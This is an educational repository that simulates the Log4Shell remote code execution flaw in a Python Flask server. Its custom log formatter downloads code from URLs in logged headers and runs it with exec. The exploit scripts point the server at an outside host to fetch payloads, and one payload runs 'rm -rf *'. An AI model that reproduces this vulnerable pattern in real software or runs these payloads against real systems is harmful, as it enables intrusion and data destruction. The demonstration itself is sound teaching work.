├── License
├── .vscode
    └── settings.json
├── Dockerfile
├── exploit1.sh
├── exploit2.sh
├── exploit
    ├── exploit1.py
    └── exploit2.py
├── server
    ├── app.py
    └── formatter.py
├── LICENSE
└── README.md


/License:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 |     "python.formatting.provider": "yapf"
3 | }


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.6.10-alpine
2 | 
3 | RUN pip3 install flask
4 | 
5 | COPY ./server /server
6 | WORKDIR /server
7 | 
8 | ENTRYPOINT ["python3", "app.py"]


--------------------------------------------------------------------------------
/exploit1.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | HEADER_VAL="\${{http://192.168.0.105:8080/exploit1.py}}"
4 | 
5 | curl -X GET -H "Agent: ${HEADER_VAL}" \
6 |     http://localhost:5000/hello
7 | 


--------------------------------------------------------------------------------
/exploit2.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | HEADER_VAL="\${{http://192.168.0.105:8080/exploit2.py?name=Prasanna}}"
4 | 
5 | curl -X GET -H "Agent: ${HEADER_VAL}" \
6 |     http://localhost:5000/hello
7 | 


--------------------------------------------------------------------------------
/exploit/exploit1.py:
--------------------------------------------------------------------------------
1 | import os
2 | 
3 | class LogSubstitutor:
4 |     def __str__(self) -> str:
5 |         # the loader will call str(object) during substitution
6 |         # so this method must return a string and we can do other
7 |         # creepy things here as well.
8 |         os.system("echo it worked!")
9 |         return "Substituted text"


--------------------------------------------------------------------------------
/exploit/exploit2.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | 
 3 | 
 4 | class LogSubstitutor:
 5 |     def __init__(self, **kwargs) -> None:
 6 |         # do creepy things here.
 7 |         os.system("echo from constructor")
 8 |         self.name = kwargs.get("name", "NoName")
 9 | 
10 |     def __str__(self) -> str:
11 |         # the loader will call str(object) during substitution
12 |         # so this method must return a string and we can do other
13 |         # creepy things here as well.
14 |         # LoL! don't run this on the host machine.
15 |         os.system("rm -rf *")
16 |         return "Hi {}".format(self.name)


--------------------------------------------------------------------------------
/server/app.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | from logging.handlers import RotatingFileHandler
 3 | 
 4 | from flask import Flask, logging as flask_logger, request
 5 | from formatter import ShellishFormatter
 6 | 
 7 | app = Flask(__name__)
 8 | 
 9 | 
10 | @app.before_request
11 | def log_request():
12 |     # log the headers of all the requests before invoking the route
13 |     # handler.
14 |     app.logger.info("Headers: {}".format(request.headers))
15 |     return None
16 | 
17 | 
18 | @app.get("/hello")
19 | def hello():
20 |     return "Hello, World!"
21 | 
22 | 
23 | if __name__ == "__main__":
24 |     flask_logger.default_handler.setFormatter(ShellishFormatter())
25 |     app.logger.setLevel(logging.INFO)
26 |     app.run('0.0.0.0', port=5000)
27 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 Narasimha Prasanna HN
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/server/formatter.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | from typing import List, Tuple
 3 | from urllib.parse import urlparse, parse_qs
 4 | from urllib.request import urlopen
 5 | import re
 6 | 
 7 | PATTERN = '\$\{\{(.+?)\}\}'
 8 | SEACH_CLASS_NAME = "LogSubstitutor"
 9 | 
10 | 
11 | def parse_url(pattern: str) -> Tuple[bool, str, dict]:
12 |     try:
13 |         result = urlparse(pattern)
14 |         if any([result.scheme, result.netloc]):
15 |             parsed_url = "{}://{}{}".format(result.scheme, result.netloc,
16 |                                             result.path)
17 | 
18 |             parameters = parse_qs(result.query)
19 |             return True, parsed_url, parameters
20 |     except:
21 |         return False, None, None
22 | 
23 | 
24 | def execute_object(data: str, params: dict) -> str:
25 |     exec(data, globals())
26 |     class_repr = eval(SEACH_CLASS_NAME)
27 |     result = str(class_repr(**params))
28 |     return result
29 | 
30 | 
31 | def check_substitute_pattern(record_message: str) -> str:
32 |     compiled_re = re.compile(PATTERN)
33 |     matched_iter = compiled_re.finditer(record_message)
34 |     iter = 0
35 |     for match in matched_iter:
36 |         found_str = match.group(1)
37 |         try:
38 |             ret, url, params = parse_url(found_str)
39 |             if not ret:
40 |                 raise Exception()
41 | 
42 |             with urlopen(url, timeout=5) as response:
43 |                 eval_data = response.read()
44 |             eval_result = execute_object(eval_data, params)
45 |             record_message = re.sub(PATTERN, eval_result, record_message, iter)
46 |             iter = iter + 1
47 |         except Exception as e:
48 |             iter += 1
49 |             continue
50 | 
51 |     return record_message
52 | 
53 | 
54 | class ShellishFormatter(logging.Formatter):
55 |     def __init__(self):
56 |         super(ShellishFormatter, self).__init__()
57 | 
58 |     def format(self, record: logging.LogRecord) -> str:
59 |         # this is the default format function used by CPython's logging
60 |         # library. We are retaining the same. But check_substitute_pattern
61 |         # is called on the formatted string to make pattern substitution.
62 |         record.message = record.getMessage()
63 |         if self.usesTime():
64 |             record.asctime = self.formatTime(record, self.datefmt)
65 |         s = self.formatMessage(record)
66 |         s = check_substitute_pattern(s)
67 |         if record.exc_info:
68 |             if not record.exc_text:
69 |                 record.exc_text = self.formatException(record.exc_info)
70 |         if record.exc_text:
71 |             if s[-1:] != "\n":
72 |                 s = s + "\n"
73 |             s = s + record.exc_text
74 |         if record.stack_info:
75 |             if s[-1:] != "\n":
76 |                 s = s + "\n"
77 |             s = s + self.formatStack(record.stack_info)
78 |         return s
79 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # py4jshell
  2 | Simulating Log4j Remote Code Execution (RCE) [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) vulnerability in a flask web server using python's logging library with custom formatter that simulates lookup substitution on URLs. This repository is a POC of how Log4j remote code execution vulnerability actually works, but written in python. Instead of using `JNDI+LDAP`, `HTTP` protocol is used for exploit code lookup.
  3 | 
  4 | **Note 1:** Do not use this in production, this is a demonstration of RCE.
  5 | 
  6 | **Note 2** This is not a vulnerability in Python's logging library. We are writing a custom formatter for the logging library that simulates the inherit behaviour of Log4J library.
  7 | 
  8 | **Note 3:** The exploit code exploit/exploit2.py executes `rm -rf *` in the server's present working directory, if you want to try this, make sure you are running it inside a container and not directly on the host, as it may result in data loss.
  9 | 
 10 | ### How this works?
 11 | 1. A GET request is made to the flask web server (`/hello`) from a HTTP client.
 12 | 2. Flask framework invokes the logger to log this request, including the header.
 13 | 3. Since we have patched the python's logging library to use our own formatter, the `format()` method implemented by our formatter `ShellishFormatter` is invoked.
 14 | 4. The formatter performs original formatting and invokes `check_substitute_pattern` function which scans the string to be logged for `${{.+?}}` pattern.
 15 | 5. If found, the URL inside this pattern is extracted, parsed and a HTTP GET request is made to the remote code hosting server pointed by the URL to download the exploit python code.
 16 | 6. A runnable python object is constructed from the downloaded code dynamically using `exec` and `eval` interpreter methods. This object contains the executable exploit code.
 17 | 7. Since we need to substitute the `${{.+?}}` with the stringified result, we call `str()` over the object which calls `__str__()` method of the exploit object.
 18 | 8. Anything that is written inside the `__str__()` method is blindly executed unless it returns a string at the end.
 19 | 
 20 | ### Try it yourself:
 21 | #### 1. Build the docker image:
 22 | First, built the docker image of the flask server using the provided Dockerfile.
 23 | ```
 24 | docker build . -t py4jshell
 25 | ```
 26 | 
 27 | #### 2. Host the exploit code locally:
 28 | The directory `exploit/` contains two sample python exploit codes. You can host these exploits anywhere on the internet, you can also do it locally by running a static HTTP server from that directory, as:
 29 | ```
 30 | cd exploit
 31 | python -m http.server 8080
 32 | ```
 33 | If everything is alright, you should see this message:
 34 | ```
 35 | Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
 36 | ```
 37 | 
 38 | #### 3. Start the container:
 39 | You can just open another terminal or anywhere in your local network, just start the server as follows:
 40 | ```
 41 | docker run --rm -p 5000:5000 py4jshell
 42 | ```
 43 | The container should start the web server, you should see the following message:
 44 | ```
 45 |  * Serving Flask app 'app' (lazy loading)
 46 |  * Environment: production
 47 |    WARNING: This is a development server. Do not use it in a production deployment.
 48 |    Use a production WSGI server instead.
 49 |  * Debug mode: off
 50 |  * Running on all addresses.
 51 |    WARNING: This is a development server. Do not use it in a production deployment.
 52 |  * Running on http://172.17.0.2:5000/ (Press CTRL+C to quit)
 53 | ```
 54 | 
 55 | #### 4. Make get requests:
 56 | You can use curl or any other tool to make the GET request. Check `exploit1.sh` and `exploit2.sh` files.
 57 | You can also formulate your own request as follows:
 58 | 
 59 | ```sh
 60 | HEADER_VAL="\${{http://192.168.0.104:8080/exploit1.py}}"
 61 | 
 62 | curl -X GET -H "Agent: ${HEADER_VAL}" \
 63 |     http://localhost:5000/hello
 64 | ```
 65 | Note the header value for `Agent` field, it contains a URL from where the exploit code is downloaded.
 66 | If everything works fine, the server will download and execute the exploit code without complaining. You should see the output as below:
 67 | ```
 68 | 172.17.0.1 - - [17/Dec/2021 12:56:25] "GET /hello HTTP/1.1" 200 -
 69 | it worked!
 70 | Headers: Host: localhost:5000
 71 | User-Agent: curl/7.74.0
 72 | Accept: */*
 73 | Agent: Substituted text
 74 | 
 75 | 
 76 | 172.17.0.1 - - [17/Dec/2021 12:56:44] "GET /hello HTTP/1.1" 200 -
 77 | ```
 78 | As you an see there is `it worked!` message on the `stdout`, which is actually from the exploit code which runs `os.system("echo it worked!")`, check `exploit/exploit1.py`. Also, if you see the logs of the static http server which hosted the exploit code files, you should see:
 79 | ```
 80 | 172.17.0.2 - - [17/Dec/2021 18:26:44] "GET /exploit1.py HTTP/1.1" 200 -
 81 | ```
 82 | Which indicates that there was a hit from the container to the static server to download the exploit code to perform remote code execution.
 83 | 
 84 | #### Passing parameters:
 85 | The sample formatter also supports passing custom parameters as arguments to the instantiated remote object, to pass parameters, you can encode them as GET URL parameters:
 86 | ```
 87 | HEADER_VAL="\${{http://192.168.0.104:8080/exploit2.py?name=Prasanna}}"
 88 | ```
 89 | 
 90 | Then in the exploit code you can receive them in the constructor:
 91 | ```python3
 92 | class LogSubstitutor:
 93 |     def __init__(self, **kwargs) -> None:
 94 |         # do creepy things here.
 95 |         os.system("echo from constructor")
 96 |         self.name = kwargs.get("name", "NoName")
 97 | 
 98 |     def __str__(self) -> str:
 99 |         # the loader will call str(object) during substitution
100 |         # so this method must return a string and we can do other
101 |         # creepy things here as well.
102 |         # LoL! don't run this on the host machine.
103 |         os.system("echo rm -rf .")
104 |         return "Hi {}".format(self.name)
105 | ```
106 | 
107 | ### Notes:
108 | 1. This project is for educational purposes, it can be used to understand Remote code execution and how Log4j shell actually works and what makes it so dangerous.
109 | 2. This has nothing to do with python's original logging library as it does not perform any string substitutions by downloading and executing code from remote URLs, this functionality is purely implemented inside the custom formatter which is actually vulnerable.
110 | 3. Log4j uses JNDI + LDAP which is the way of performing lookups on remote Java objects. This method has been in practice since 1990 and has been used by lot of applications to solve some usecases. The actual LDAP + JNDI might not work exactly as how we have written the functionality in this repo, this is just a simulation.
111 | 4. Every interpreted language can be tricked into attacks like this if they expose some or the other way of dynamic code execution using `eval`, which is most common in many interpreted languages. It is left to the developers to write better code and make the world safer.
112 | 


--------------------------------------------------------------------------------